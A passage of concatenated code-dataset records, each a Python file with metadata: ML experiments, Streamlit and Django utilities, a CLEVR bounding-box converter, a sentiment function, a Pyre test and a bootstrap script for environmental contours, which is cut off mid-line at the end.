get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(.005, .0005, const_multiplier=0.0, n_tot_iters=7000, n_fisher_iters=2000, record_tensorboard=False, regularizer_mode='hvp_adam')\n# a, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(.005, .0005, const_multiplier=0.5, n_tot_iters=7000, n_fisher_iters=2000, record_tensorboard=False, regularizer_mode='hvp_adam')\n# a, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(.005, .05, const_multiplier=0.005, n_tot_iters=7000, n_fisher_iters=2000, record_tensorboard=False, regularizer_mode='hvp_adam')\n# a, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(.02, .05, const_multiplier=0.005, n_tot_iters=7000, n_fisher_iters=2000, record_tensorboard=False, regularizer_mode='none')\n# a, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(.2, .1, const_multiplier=0.0, n_tot_iters=7000, n_fisher_iters=2000, record_tensorboard=False, regularizer_mode='none')\n\n\n\n","sub_path":"delta_theta_models.py","file_name":"delta_theta_models.py","file_ext":"py","file_size_in_byte":12208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"307533875","text":"import os, sys, io\nimport streamlit as st\nimport numpy as np\nfrom PIL import Image\nimport urllib.request as urllib\n\ndef show_miro_logo(use_column_width = False, width = 100, st_asset= st.sidebar):\n\tlogo_url = 'https://miro.medium.com/max/1400/0*qLL-32srlq6Y_iTm.png'\n\tst_asset.image(logo_url, use_column_width = use_column_width, channels = 'BGR', format = 'PNG', width = width)\n\ndef file_selector(folder_path='.', st_asset = st, extension_tuple = None,\n\tstr_msg = \"Select a file\", get_dir = False):\n\t'''\n\tusing streamlit selectbox to return a filepath\n\t'''\n\tif not folder_path:\n\t\treturn None\n\telse:\n\t\tif not os.path.isdir(folder_path):\n\t\t\tst_asset.warning(f'`{folder_path}` is not a valid directory path')\n\t\t\treturn None\n\n\t\tfilenames = os.listdir(folder_path)\n\t\tif get_dir:\n\t\t\tfilenames = [f for f in filenames if os.path.isdir(os.path.join(folder_path, f))]\n\t\telif extension_tuple:\n\t\t\tfilenames = [f for f in filenames if f.endswith(extension_tuple) and os.path.isfile(os.path.join(folder_path, f))]\n\t\tselected_filename = st_asset.selectbox(str_msg, sorted(filenames))\n\t\treturn os.path.join(folder_path, selected_filename)\n\ndef get_image(st_asset = st.sidebar, as_np_arr = False, extension_list = ['jpg', 'jpeg', 'png']):\n\timage_url = st_asset.text_input(\"Enter Image URL\")\n\timage_fh = st_asset.file_uploader(label = \"Update your image\", type = extension_list)\n\n\tif image_url and image_fh:\n\t\tst_asset.warning(f'image url takes precedence over uploaded image file')\n\n\tim = None\n\n\tif image_url:\n\t\tresponse = urllib.urlopen(image_url)\n\t\tim = Image.open(io.BytesIO(bytearray(response.read())))\n\telif image_fh:\n\t\tim = Image.open(image_fh)\n\n\tif im and as_np_arr:\n\t\tim = np.array(im)\n\treturn im\n","sub_path":"streamlit_demo/st_utils.py","file_name":"st_utils.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"343495870","text":"import os\nimport tensorflow as tf\nimport tsms\nfrom typing import Dict\nfrom tcvae import model, localconfig\nfrom tcvae.compute_measures import heuristic_names\nimport numpy as np\n\n\nclass SoundGenerator:\n _instance = None\n\n def __new__(cls, *args, **kwargs):\n if cls._instance is None:\n cls._instance = super(SoundGenerator, cls).__new__(cls)\n return cls._instance\n\n def __init__(self, config_path: str = None):\n assert os.path.isfile(config_path)\n self.config_path = config_path\n self.conf = localconfig.LocalConfig()\n self.conf.load_config_from_file(config_path)\n self.model = None\n # Prediction specific config\n self.conf.batch_size = 1\n self.measure_to_index = dict((n, i) for i, n in enumerate(heuristic_names))\n self.index_to_measure = dict((v, k) for k, v in self.measure_to_index.items())\n\n def load_model(self, checkpoint_path: str = None) -> None:\n assert os.path.isfile(checkpoint_path), f\"No checkpoint at {checkpoint_path}\"\n self.model = model.MtVae(self.conf)\n # ToDo - Add input shapes\n self.model.build([])\n self.model.load_weights(checkpoint_path)\n print(\"Model loaded\")\n\n def _get_mask(self, note_number):\n f0 = tsms.core.midi_to_f0_estimate(note_number, self.conf.frame_size,\n self.conf.frame_size)\n harmonics = tsms.core.get_number_harmonics(f0, self.conf.sample_rate)\n harmonics = np.squeeze(harmonics)\n mask = np.zeros((1, self.conf.harmonic_frame_steps, 110))\n mask[:, :, :harmonics] = np.ones((1, self.conf.harmonic_frame_steps, harmonics))\n return mask\n\n def _prepare_params(self, params: Dict) -> Dict:\n output = {}\n\n note_number = params.get(\"note_number\") or 60\n velocity = params.get(\"velocity\") or 50\n measures = params.get(\"measures\") or {}\n\n assert 40 <= note_number <= 88\n note_number -= self.conf.starting_midi_pitch\n updated_note = np.zeros((1, self.conf.num_pitches))\n updated_note[:, note_number] = 1.\n output[\"note_number\"] = updated_note\n\n assert 25 <= velocity <= 127\n velocity = int(velocity / 25 - 1)\n updated_vel = np.zeros((1, self.conf.num_velocities))\n updated_vel[:, velocity] = 1.\n output[\"velocity\"] = updated_vel\n\n updated_measures = [0.2] * self.conf.num_measures\n\n for m, val in measures.items():\n assert m in heuristic_names\n updated_measures[self.measure_to_index[m]] = val\n\n output[\"measures\"] = np.expand_dims(updated_measures, axis=0)\n\n if \"z\" in params:\n updated_z = params.get(\"z\")\n for val in updated_z:\n assert 0 <= val <= 1\n updated_z = np.expand_dims(updated_z, axis=0)\n assert updated_z.shape == (1, 16)\n output[\"z\"] = updated_z\n else:\n print(\"Updating z from random values\")\n output[\"z\"] = np.random.rand(1, 16)\n return output\n\n def _get_prediction(self, params: Dict, prediction: tf.Tensor) -> np.ndarray:\n params = params.copy()\n\n note_number = np.argmax(params[\"note_number\"], axis=-1) + self.conf.starting_midi_pitch\n transform = self.conf.data_handler.output_transform(prediction, pred=True)\n mask = self._get_mask(note_number)\n\n h_freq, h_mag, h_phase = self.conf.data_handler.denormalize(\n transform, mask, note_number)\n audio = tsms.core.harmonic_synthesis(\n h_freq, h_mag, h_phase, self.conf.sample_rate, self.conf.frame_size)\n return np.squeeze(audio.numpy())\n\n def get_prediction(self, params: Dict) -> np.ndarray:\n params = params.copy()\n\n params = self._prepare_params(params)\n prediction = self.model.decoder.predict(params)\n audio_pred = self._get_prediction(params, prediction=prediction)\n\n return audio_pred\n","sub_path":"timbre_conditioned_vae/sound_generator.py","file_name":"sound_generator.py","file_ext":"py","file_size_in_byte":3985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"616064090","text":"'''\n Copyright 2017 Larry Chen\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n'''\n\nimport os\nimport sys\nimport argparse\nimport collections\nimport json\nimport re\nimport time\n\nimport numpy as np\nfrom PIL import Image\nimport tensorflow as tf\n\nflags = tf.app.flags\nflags.DEFINE_string('image_dir', '', 'Path to CLEVR image directory')\nflags.DEFINE_string('scene_file', '', 'Path to CLEVR scene file')\nflags.DEFINE_string('output_path', '', 'Path to output TFRecord')\nFLAGS = flags.FLAGS\n\n\ndef generate_label_map():\n sizes = ['large', 'small']\n colors = ['gray', 'red', 'blue', 'green', 'brown', 'purple', 'cyan', 'yellow']\n materials = ['rubber', 'metal']\n shapes = ['cube', 'sphere', 'cylinder']\n\n names = [s + ' ' + c + ' ' + m + ' ' + sh for s in sizes for c in colors for m in materials for sh in shapes]\n\n with open(os.path.join(FLAGS.output_path, 'clevr_label_map.pbtxt'), 'w') as f:\n [f.write('item {\\n id: %d\\n name: \\'%s\\'\\n}\\n\\n' %(i+1, name)) for i, name in enumerate(names)]\n f.close()\n\n return names\n\n\ndef extract_bounding_boxes(scene, names):\n objs = scene['objects']\n rotation = scene['directions']['right']\n\n num_boxes = len(objs)\n\n boxes = np.zeros((1, num_boxes, 4))\n\n xmin = []\n ymin = []\n xmax = []\n ymax = []\n classes = []\n classes_text = []\n\n for i, obj in enumerate(objs):\n [x, y, z] = obj['pixel_coords']\n\n [x1, y1, z1] = obj['3d_coords']\n\n cos_theta, sin_theta, _ = rotation\n\n x1 = x1 * cos_theta + y1* sin_theta\n y1 = x1 * -sin_theta + y1 * cos_theta\n\n\n height_d = 6.9 * z1 * (15 - y1) / 2.0\n height_u = height_d\n width_l = height_d\n width_r = height_d\n\n if obj['shape'] == 'cylinder':\n d = 9.4 + y1\n h = 6.4\n s = z1\n\n height_u *= (s*(h/d + 1)) / ((s*(h/d + 1)) - (s*(h-s)/d))\n height_d = height_u * (h-s+d)/ (h + s + d)\n\n width_l *= 11/(10 + y1)\n width_r = width_l\n\n if obj['shape'] == 'cube':\n height_u *= 1.3 * 10 / (10 + y1)\n height_d = height_u\n width_l = height_u\n width_r = height_u\n \n obj_name = obj['size'] + ' ' + obj['color'] + ' ' + obj['material'] + ' ' + obj['shape']\n classes_text.append(obj_name.encode('utf8'))\n classes.append(names.index(obj_name) + 1)\n ymin.append((y - height_d)/320.0)\n ymax.append((y + height_u)/320.0)\n xmin.append((x - width_l)/480.0)\n xmax.append((x + width_r)/480.0)\n\n return xmin, ymin, xmax, ymax, classes, classes_text\n\n\ndef file_to_example_dict(scene_file, names):\n with open(scene_file) as sf:\n scene_data = json.load(sf)\n scenes = scene_data['scenes']\n\n examples = []\n\n for scene in scenes:\n xmins, ymins, xmaxs, ymaxs, classes, classes_text = extract_bounding_boxes(scene, names)\n\n example = {\n 'xmins': xmins,\n 'ymins': ymins,\n 'xmaxs': xmaxs,\n 'ymaxs': ymaxs,\n 'classes': classes,\n 'classes_text': classes_text,\n 'filename': scene['image_filename']\n }\n examples.append(example)\n\n return examples\n\n\ndef create_tf_example(example, image_dir):\n # TODO(user): Populate the following variables from your example.\n img_path = os.path.join(image_dir, example['filename'])\n with tf.gfile.GFile(img_path, 'rb') as fid:\n encoded_png = fid.read()\n\n height = 320\n width = 480\n filename = example['filename']\n image_format = 'png'\n\n xmins = example['xmins']\n xmaxs = example['xmaxs']\n ymins = example['ymins']\n ymaxs = example['ymaxs']\n\n classes_text = example['classes_text']\n classes = example['classes']\n\n tf_example = tf.train.Example(features=tf.train.Features(feature={\n 'image/height': tf.train.Feature(int64_list=tf.train.Int64List(value=[height])),\n 'image/width': tf.train.Feature(int64_list=tf.train.Int64List(value=[width])),\n 'image/filename': tf.train.Feature(bytes_list=tf.train.BytesList(value=[filename.encode('utf8')])),\n 'image/source_id': tf.train.Feature(bytes_list=tf.train.BytesList(value=[filename.encode('utf8')])),\n 'image/encoded': tf.train.Feature(bytes_list=tf.train.BytesList(value=[encoded_png])),\n 'image/format': tf.train.Feature(bytes_list=tf.train.BytesList(value=[image_format.encode('utf8')])),\n 'image/object/bbox/xmin': tf.train.Feature(float_list=tf.train.FloatList(value=xmins)),\n 'image/object/bbox/xmax': tf.train.Feature(float_list=tf.train.FloatList(value=xmaxs)),\n 'image/object/bbox/ymin': tf.train.Feature(float_list=tf.train.FloatList(value=ymins)),\n 'image/object/bbox/ymax': tf.train.Feature(float_list=tf.train.FloatList(value=ymaxs)),\n 'image/object/class/text': tf.train.Feature(bytes_list=tf.train.BytesList(value=classes_text)),\n 'image/object/class/label': tf.train.Feature(int64_list=tf.train.Int64List(value=classes))\n }))\n\n return tf_example\n\ndef write_tf_examples(names):\n examples = file_to_example_dict(FLAGS.scene_file, names)\n\n writer = tf.python_io.TFRecordWriter(os.path.join(FLAGS.output_path, 'clevr_object_detect.tfrecord'))\n\n for i, example in enumerate(examples):\n tf_example = create_tf_example(example, FLAGS.image_dir)\n if i % 100 == 0:\n print('\\rOn image %d of %d' %(i, len(examples)), end='')\n writer.write(tf_example.SerializeToString())\n\n writer.close()\n\ndef main(_):\n names = generate_label_map()\n write_tf_examples(names)\n\n\nif __name__ == '__main__':\n tf.app.run()","sub_path":"bounding_box.py","file_name":"bounding_box.py","file_ext":"py","file_size_in_byte":5808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"215610405","text":"#This script runs vader sentiment analysis on string passed as 'text'\nimport pandas as pd\nimport nltk\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\n\nnltk.download('vader_lexicon')\n\n\ndef analyze_text(text):\n\n sid = SentimentIntensityAnalyzer()\n\n filtered_text = text.strip('./')\n print(filtered_text)\n text_results = {}\n ss = sid.polarity_scores(filtered_text)\n text_results['negative'] = ss['neg']\n text_results['neutral'] = ss['neu']\n text_results['positive'] = ss['pos']\n text_results['polarity'] = ss['compound']\n\n return (text_results)\n\n\n\n\n","sub_path":"app/vadar_function.py","file_name":"vadar_function.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"186867823","text":"from django.contrib import messages\nfrom django.db.models import Q\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse, HttpRequest, Http404\nfrom django.urls import reverse\nfrom main.models_addon.ya_market import Offer\nfrom main.modules.base import BaseView\nfrom main.modules.offers.addition.save_yandex import push_offer_to_ym, push_offer_price_to_ym\nfrom main.view import Navbar, Page, Filtration, FilterCollection\nfrom main.ya_requests import OfferList, OfferPrice\nimport re\n\n\nclass CatalogueView(BaseView):\n context = {'title': 'Каталог товаров', 'page_name': 'Каталог товаров'}\n models_to_save = [OfferList, OfferPrice]\n fields = ['name', 'shopSku', 'category', 'vendor']\n table = ['', 'Название', 'SKU', 'Категория', 'Продавец']\n\n filtration = Filtration([\n FilterCollection(display_name='Торговая марка', filter_name='vendor'),\n FilterCollection(display_name='Категория', filter_name='category'),\n FilterCollection(display_name='Планы по поставкам', enum='availability'),\n ])\n\n content_types = {\n 'Весь список': Q(),\n 'Прошли модерацию': Q(processingState__status='READY'),\n 'На модерации': Q(processingState__status='IN_WORK'),\n 'Не прошли модерацию': Q(processingState__status__in=['NEED_CONTENT', 'NEED_INFO', 'REJECTED', 'SUSPENDED',\n 'OTHER']),\n 'Изменены локально': Q(processingState__isnull=False) & (Q(has_changed=True) | Q(price__has_changed=True)),\n 'Созданы локально': Q(processingState__isnull=True),\n 'Не рентабельные': None,\n }\n\n def find_offers_id_by_regular(self, request, regular_string=r'form-checkbox:'):\n \"\"\"Метод для получения товаров, отмеченных в checkbox\"\"\"\n offers_ids = [re.sub(regular_string, '', line) for line in list(dict(request.POST).keys())[1:-1]]\n return self.configure_offer().filter(id__in=offers_ids)\n\n def push_price(self, offers):\n \"\"\"\"Обработка запроса на изменение цены на Яндексе\"\"\"\n prices = [offer.get_price for offer in offers if offer.price.has_changed]\n push_offer_price_to_ym(request=self.request, prices=prices, sku_list=offers.values_list('shopSku', flat=True),\n success_msg=\"Все цены на товары успешно отправлены\")\n\n def push_offer(self, offers):\n \"\"\"Обработка запроса на обновление или сохранение товара на Яндексе\"\"\"\n push_offer_to_ym(request=self.request, offers=offers.filter(has_changed=True),\n sku_list=offers.values_list('shopSku', flat=True),\n success_msg=\"Все товары успешно отправлены\")\n\n def button_push(self):\n offers = self.find_offers_id_by_regular(self.request)\n if not offers:\n offers = self.configure_offer()\n self.push_offer(offers=offers)\n self.push_price(offers=offers)\n return redirect(reverse('catalogue_offer'))\n\n def check_box(self):\n [offer.delete() for offer in self.find_offers_id_by_regular(self.request)]\n return redirect(reverse('catalogue_offer'))\n\n def post(self, request: HttpRequest) -> HttpResponse:\n self.request = request\n data = {\n 'button_loader': lambda: self.save_models(request=request, name='catalogue_offer'),\n 'button_push': self.button_push,\n 'checkbox': self.check_box,\n }\n for key in data.keys():\n if key in request.POST:\n return data[key]()\n return redirect(reverse('catalogue_offer'))\n\n def configure_offer(self):\n \"\"\"Метод для получения товаров с нужным статусом\"\"\"\n if self.category_index == 'Не рентабельные':\n return [offer for offer in Offer.objects.filter(user=self.request.user).select_related('price')\n if offer.check_rent]\n return Offer.objects.filter(Q(user=self.request.user) & self.content_types[self.category_index])\n\n def get(self, request: HttpRequest) -> HttpResponse:\n self.request = request\n self.category_index = request.GET.get('content', 'Весь список')\n if self.category_index not in self.content_types:\n messages.success(self.request, f'Каталог {self.category_index.lower()} пуст')\n return redirect(reverse('catalogue_offer'))\n offers = self.configure_offer()\n if not offers and self.category_index != 'Весь список':\n messages.success(self.request, f'Каталог {self.category_index.lower()} пуст')\n return redirect(reverse('catalogue_offer'))\n filter_types = self.filtration.get_filter_types(offers)\n local_context = {\n 'navbar': Navbar(request).get(),\n 'table': self.table,\n 'filter_types': filter_types,\n 'current_type': self.category_index,\n 'types': self.content_types,\n 'offers': self.sort_object(offers, filter_types),\n }\n self.context_update(local_context)\n return render(request, Page.catalogue, self.context)\n","sub_path":"main/modules/offers/catalogue.py","file_name":"catalogue.py","file_ext":"py","file_size_in_byte":5548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"416285641","text":"# To change this license header, choose License Headers in Project Properties.\n# To change this template file, choose Tools | Templates\n# and open the template in the editor.\n\nfrom django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.post_list, name='post_list'),\n url(r'^post/(?P\\d+)/$', views.post_detail, name='post_detail'),\n url(r'^post/new/$', views.post_new, name='post_new'),\n url(r'^post/(?P\\d+)/edit/$', views.post_edit, name='post_edit'),\n]\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"520790279","text":"# Copyright (c) 2016-present, Facebook, Inc.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\n# pyre-unsafe\n\nimport unittest\nfrom unittest.mock import MagicMock, mock_open, patch\n\nfrom ... import commands # noqa\nfrom ...analysis_directory import AnalysisDirectory\nfrom ..color import CoverageLevel, TypeAnnotation\nfrom .command_test import mock_arguments, mock_configuration\n\n\nclass ColorTest(unittest.TestCase):\n @patch(\"builtins.open\")\n @patch(\"sys.exit\")\n def test_query(self, sys, open_mock) -> None:\n arguments = mock_arguments()\n configuration = mock_configuration()\n original_directory = \"/original/directory\"\n open_mock.return_value = mock_open(\n read_data=\"\"\"\n def foo() -> int:\n pass\n \"\"\"\n ).return_value\n with patch.object(commands.Command, \"_call_client\") as call_client:\n result = MagicMock()\n result.output = '{\"response\": {\"types\": []}}'\n call_client.return_value = result\n arguments.file = \"\"\n commands.Color(\n arguments, original_directory, configuration, AnalysisDirectory(\".\")\n ).run()\n call_client.assert_called_once_with(command=commands.Query.NAME)\n\n def test_type_annotations(self) -> None:\n json_example = {\n \"location\": {\n \"path\": \"a/b.py\",\n \"start\": {\"line\": 6, \"column\": 8},\n \"stop\": {\"line\": 6, \"column\": 9},\n },\n \"coverage\": [\"Partial\"],\n }\n annotation = TypeAnnotation.create_from_json(json_example)\n self.assertEqual(annotation.start_line, 6)\n self.assertEqual(annotation.stop_line, 6)\n self.assertEqual(annotation.start_column, 8)\n self.assertEqual(annotation.stop_column, 9)\n self.assertEqual(annotation.coverage, CoverageLevel.PARTIAL)\n","sub_path":"client/commands/tests/color_test.py","file_name":"color_test.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"582757268","text":"@staticmethod\ndef images_equal(path1, path2):\n from PIL import Image, ImageChops\n from io import BytesIO\n bucket_name = os.environ.get('BUCKET_NAME', app_identity.get_default_gcs_bucket_name())\n bucket = '/' + bucket_name\n retryParameters = gcs.RetryParams(initial_delay=0.2,\n max_delay=5.0,\n backoff_factor=2,\n max_retry_period=15,\n urlfetch_timeout=30)\n\n path1 = bucket + path1\n path2 = bucket + path2\n\n f1 = gcs.open(path1, 'r', retry_params=retryParameters)\n f2 = gcs.open(path2, 'r', retry_params=retryParameters)\n img_bytes1 = BytesIO(f1.read())\n img_bytes2 = BytesIO(f2.read())\n im1 = Image.open(img_bytes1)\n im2 = Image.open(img_bytes2)\n\n diff = ImageChops.difference(im1, im2).getbbox()\n\n f1.close()\n f2.close()\n img_bytes1.close()\n img_bytes2.close()\n\n return (diff is None)\n\n","sub_path":"classes/Helpers_/images_equal.py","file_name":"images_equal.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"56018915","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 5 16:13:16 2020\n\n@author: astah\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom viroconcom.fitting import Fit\nfrom viroconcom.contours import IFormContour\nfrom plot import plot_contour, PlottedSample, plot_confidence_interval\nfrom read_write import read_dataset, determine_file_name_e2, write_contour, read_contour\nfrom contour_intersection import contour_intersection\nfrom contour_statistics import thetastar_to_theta\nfrom scipy.stats import norm, weibull_min, chi2\nfrom scipy.optimize import curve_fit\n\n# Define the number of years of data that one bootstrap sample should contain.\n# In the exercise 1, 5 and 25 years are used.\nNR_OF_YEARS_TO_DRAW = 25\n\nDO_COMPUTE_CONFIDENCE_INTERVAL = True\nNR_OF_BOOTSTRAP_SAMPLES = 1000 # Must be 1000 in Exercise 2.\nBOTTOM_PERCENTILE = 2.5 # Must be 2.5 in Exercise 2.\nUPPER_PERCENTILE = 97.5 # Must be 97.5 in Excercise 2.\nANGLE_STEP_FOR_CI = 2 # Must be 2 in in Excercise 2.\n\nDO_PLOT_ANGLE_LINES = False # Must be False in Excercise 2. For visualization.\nNR_OF_POINTS_ON_CONTOUR = 200 # For IFORM contours it can be set explicitly.\n\n# Read dataset D.\nfile_path = '../datasets/D.txt'\ndataset_d_v, dataset_d_hs, label_v, label_hs = read_dataset(file_path)\n\n# Define the origin (will be used to compute confidence intervals).\nv0 = np.mean(dataset_d_v)\nhs0 = np.mean(dataset_d_hs)\n#print('Origin:')\n#print(v0)\n#print(hs0)\n\nnr_of_datapoints_to_draw = int(NR_OF_YEARS_TO_DRAW * 365.25 * 24)\nreturn_period = 50\np_r = 1/int(return_period*365.25*24)\n#np.random.seed(9001)\nbin_size = 0.5\nbounds = ([0,0,0],[np.inf, np.inf, np.inf])\nphi = np.linspace(0, 2 * np.pi, NR_OF_POINTS_ON_CONTOUR)\nbeta50 = np.sqrt(chi2.ppf(1-p_r, df=2))\nu0_50 = beta50*np.cos(phi)\nu1_50 = beta50*np.sin(phi)\n\ntheta_v_ij = np.zeros(shape=(NR_OF_BOOTSTRAP_SAMPLES, int(360/ANGLE_STEP_FOR_CI)))\ntheta_hs_ij = np.zeros(shape=(NR_OF_BOOTSTRAP_SAMPLES, int(360/ANGLE_STEP_FOR_CI)))\n\n\ndef power3(x, a, b, c):\n return a + b * x ** c\n\nfor i in range(NR_OF_BOOTSTRAP_SAMPLES):\n # Resample from the hindcast dataset to get the sample D_i.\n sample_indices = np.random.randint(dataset_d_v.size, size=nr_of_datapoints_to_draw)\n v_i = np.take(dataset_d_v, sample_indices)\n hs_i = np.take(dataset_d_hs, sample_indices)\n # Fit Weibull to Hs:\n weib_par2 = weibull_min.fit(hs_i, loc=0)\n # Find the conditional Weibull for V:\n h_min = hs_i.min()\n h_max = hs_i.max()\n\n h_bins = np.arange(np.floor(h_min), np.ceil(h_max), bin_size) + bin_size/2\n h_binedges = h_bins + bin_size/2\n\n h_ind_bin = np.digitize(hs_i, bins=h_binedges)\n unique, counts = np.unique(h_ind_bin, return_counts=True)\n\n ind_min_bin = unique[counts>10][0]\n ind_max_bin = unique[counts>10][-1]\n x_bins = h_bins[ind_min_bin:ind_max_bin+1]\n real_bins = np.zeros(len(x_bins))\n\n weib_par_cond = np.zeros((len(x_bins),3))\n\n for j in range(len(x_bins)):\n mask1 = h_ind_bin == j + ind_min_bin\n real_bins[j] = hs_i[mask1].mean()\n weib_par_cond[j,:] = weibull_min.fit(v_i[mask1], floc=0)\n try:\n k = curve_fit(power3, real_bins, weib_par_cond[:,0], bounds=bounds)[0]\n a = curve_fit(power3, real_bins, weib_par_cond[:,2], bounds=bounds)[0]\n except RuntimeError: \n try:\n k = curve_fit(power3, real_bins[0:-1], weib_par_cond[0:-1,0], bounds=bounds)[0]\n a = curve_fit(power3, real_bins[0:-1], weib_par_cond[0:-1,2], bounds=bounds)[0]\n except RuntimeError: \n k = curve_fit(power3, real_bins[0:-2], weib_par_cond[0:-2,0], bounds=bounds)[0]\n a = curve_fit(power3, real_bins[0:-2], weib_par_cond[0:-2,2], bounds=bounds)[0]\n\n x1_50 = weibull_min.ppf( norm.cdf(u1_50), *weib_par2)\n\n # The weibull conditional distribution\n k_x1_50 = power3(x1_50, *k)\n a_x1_50 = power3(x1_50, *a)\n\n x0_50 = weibull_min.ppf( norm.cdf(u0_50), k_x1_50, loc=0, scale=a_x1_50)\n\n# import seaborn as sns\n# h = sns.jointplot(x= v_i , y=hs_i, s=5)\n# h.x, h.y = x0_50, x1_50\n# h.plot_joint(plt.plot, color='C1')\n \n# ids_contour_i = []\n # Compute 50-yr IFORM contour.\n# iform_contour_i = IFormContour(my_fit.mul_var_dist, return_period, 1,\n# NR_OF_POINTS_ON_CONTOUR)\n \n if DO_COMPUTE_CONFIDENCE_INTERVAL:\n # Define angles based on normalization.\n theta_stars = np.arange(0, 360, ANGLE_STEP_FOR_CI) / 180 * np.pi\n t1 = max(dataset_d_v) - min(dataset_d_v)\n t2 = max(dataset_d_hs) - min(dataset_d_hs)\n #print('t1: ' + str(t1))\n #print('t2: ' + str(t2))\n thetas = thetastar_to_theta(theta_stars, t1, t2)\n #print('Thetas: ' + str(thetas / np.pi * 180))\n #print('Theta_stars: ' + str(theta_stars/np.pi * 180))\n nr_of_datapoints_on_angled_line = 10\n line_tot_length = 50.0\n line_length = np.linspace(0.0, line_tot_length, nr_of_datapoints_on_angled_line)\n\n # Compute lines that have an angle theta to the x-axis.\n theta_line_v = list()\n theta_line_hs = list()\n theta_v = list()\n theta_hs = list()\n for j, theta in enumerate(thetas):\n theta_line_v.append(np.multiply(np.cos(theta), line_length) + v0)\n theta_line_hs.append(np.multiply(np.sin(theta), line_length) + hs0)\n# c_v = np.append(x1_50, x1_50[0])\n# c_hs = np.append(x0_50, x0_50[0])\n theta_v_j, theta_hs_j = contour_intersection(\n theta_line_v[j], theta_line_hs[j], x0_50, x1_50, True)\n theta_v_ij[i,j] = theta_v_j\n theta_hs_ij[i,j] = theta_hs_j\n# theta_v.append(theta_v_j)\n# theta_hs.append(theta_hs_j)\n\n if i == 0:\n contour0, contour1 = [x0_50], [x1_50]\n else:\n contour0.append(x0_50)\n contour1.append(x1_50)\n \n# Plot the environmental contours.\nfig = plt.figure(figsize=(5, 5), dpi=150)\nax = fig.add_subplot(111)\nfor i in range(len(contour0)):\n if i == 0:\n plotted_sample = PlottedSample(x=np.asarray(dataset_d_v),\n y=np.asarray(dataset_d_hs),\n ax=ax,\n label='dataset D')\n contour_label = str(return_period) + '-yr contour'\n plot_contour(x=contour0[i],\n y=contour1[i],\n ax=ax,\n contour_label=contour_label,\n x_label=label_v,\n y_label=label_hs,\n line_style='b-',\n alpha=0.4,\n plotted_sample=plotted_sample)\n else:\n plot_contour(x=contour0[i],\n y=contour1[i],\n line_style='b-',\n alpha=0.4,\n ax=ax)\n if DO_COMPUTE_CONFIDENCE_INTERVAL and DO_PLOT_ANGLE_LINES:\n for j, (line_v, line_hs) in enumerate(zip(theta_line_v, theta_line_hs)):\n if i == 0:\n plt.plot(line_v, line_hs, 'r-')\n plt.plot(theta_v, theta_hs, 'gx')\nif NR_OF_YEARS_TO_DRAW == 1:\n plt.title('Samples cover ' + str(NR_OF_YEARS_TO_DRAW) + ' year')\nelse:\n plt.title('Samples cover ' + str(NR_OF_YEARS_TO_DRAW) + ' years')\nplt.xlim((0, 32))\nplt.ylim((0, 14))\nplt.show()\nplt.savefig('../results/figures/hannesdottir_asta_exercise2_'+ str(NR_OF_YEARS_TO_DRAW) +'yr_allcontours.png', dpi=300)\n\nif DO_COMPUTE_CONFIDENCE_INTERVAL:\n# theta_v_ij = np.zeros(shape=(len(contour0), thetas.size))\n# theta_hs_ij = np.zeros(shape=(len(contour0), thetas.size))\n distance_to_origin_ij = np.zeros(shape=(len(contour0), thetas.size))\n# for i, contour in enumerate(contours):\n for i in range(len(contour0)):\n for j in range(len(thetas)):\n# for j, (v_j, hs_j) in enumerate(zip(contour.theta_v, contour.theta_hs)):\n v_j = theta_v_ij[i, j]\n hs_j = theta_hs_ij[i, j]\n o = np.array([v0, hs0])\n p = np.array([v_j, hs_j]).flatten()\n op = p - o\n distance_to_origin_ij[i, j] = np.sqrt(op[0]*op[0] + op[1]*op[1])\n sorted_v = np.zeros(shape=(len(contour0), thetas.size))\n sorted_hs = np.zeros(shape=(len(contour0), thetas.size))\n for j in range(thetas.size):\n sorted_indices = np.argsort(distance_to_origin_ij[:, j])\n sorted_v[:, j] = theta_v_ij[sorted_indices, j]\n sorted_hs[:, j] = theta_hs_ij[sorted_indices, j]\n percentile50_index = int(round((NR_OF_BOOTSTRAP_SAMPLES - 1) * (50.0 / 100.0)))\n bottom_percentile_index = int(round((NR_OF_BOOTSTRAP_SAMPLES - 1) * (BOTTOM_PERCENTILE / 100.0)))\n upper_percentile_index = int(round((NR_OF_BOOTSTRAP_SAMPLES - 1) * (UPPER_PERCENTILE 